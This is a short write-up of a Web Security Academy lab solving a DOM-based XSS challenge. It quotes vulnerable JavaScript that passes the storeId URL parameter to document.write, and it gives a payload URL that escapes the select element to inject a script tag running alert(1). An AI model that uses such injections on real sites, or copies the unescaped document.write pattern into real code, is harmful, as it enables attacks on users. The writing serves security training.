WSA: DOM XSS in document.write sink using source location.search

Not much to say here, just glad to have found some time for challenges ;P

You can check the lab out: here

Starting with the usual progress, checking stuff, while allowing all traffic through our proxy to be able to replicate any requests later on. ¹

In each product page there is a “Check Stock” functionality, which after previewing the source code, is handled by the following javascript snippet:

var stores = ["London","Paris","Milan"];
var store = (new URLSearchParams(window.location.search)).get('storeId');
document.write('<select name="storeId">');
if(store) {
    document.write('<option selected>'+store+'</option>');
}
for(var i=0;i<stores.length;i++) {
    if(stores[i] === store) {
        continue;
    }
    document.write('<option>'+stores[i]+'</option>');
}
document.write('</select>');

In our request we can see that, the variables can be modified:

productId=1&storeId=London

Sample link that gives us the desired output in console:

https://0a0000f80482f11380d980510011009c.web-security-academy.net/product?productId=1&storeId=asdfasdf

After that it was tedious: We just had to get out of the existing environments and add a script one:

https://0a0000f80482f11380d980510011009c.web-security-academy.net/product?productId=1&storeId=</option></select><script>alert(1)</script>

This was the first challenge I completed for the day, and I think it was the perfect way to start it: not too easy, but at the same time not too difficult.

Paying some attention to the vulnerable snippet was all that was needed here!